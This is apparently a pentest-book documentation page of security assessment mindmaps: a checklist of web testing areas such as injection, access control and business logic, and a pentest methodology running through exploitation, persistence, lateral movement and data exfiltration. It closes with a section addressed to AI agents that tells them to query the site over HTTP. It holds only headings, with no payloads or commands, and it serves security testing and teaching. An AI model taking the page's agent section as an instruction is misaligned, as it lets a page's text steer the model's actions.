# Master assessment mindmaps

## Web Application Pentesting Mindmap

Key areas to assess during web application security testing:

### Reconnaissance

* Subdomain enumeration
* Technology fingerprinting
* Hidden content discovery
* API endpoint mapping

### Authentication Testing

* Brute force protection
* Password policies
* Session management
* Multi-factor authentication bypass
* Account lockout mechanisms

### Authorization Testing

* Horizontal privilege escalation (IDOR)
* Vertical privilege escalation
* Function-level access control
* Insecure direct object references

### Input Validation

* SQL Injection (all types)
* XSS (Reflected, Stored, DOM)
* Command Injection
* SSRF / CSRF
* XXE Injection
* Template Injection (SSTI)

### Business Logic

* Workflow bypass
* Price manipulation
* Quantity tampering
* Feature abuse

### Infrastructure

* Server misconfigurations
* Default credentials
* Exposed admin panels
* Information disclosure

![](/files/-MG33dIgvN3YUZUMnKCs)

## Bug Bounty Methodology

![](https://blog.it-securityguard.com/pbbt.png)

## Comprehensive Pentest Methodology

### Phase 1: Information Gathering

1. Passive reconnaissance (OSINT)
2. Active scanning and enumeration
3. Vulnerability identification

### Phase 2: Exploitation

1. Vulnerability validation
2. Exploit development/selection
3. Initial access

### Phase 3: Post-Exploitation

1. Privilege escalation
2. Persistence
3. Lateral movement
4. Data exfiltration

### Phase 4: Reporting

1. Finding documentation
2. Risk assessment
3. Remediation recommendations

![](/files/-MB8iKf1-S8141P3waGS)

## Additional Resources

* [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
* [PortSwigger Web Security Academy](https://portswigger.net/web-security)
* [HackTricks](https://book.hacktricks.xyz/)
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentest-book.com/others/master-assessment-mindmap.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.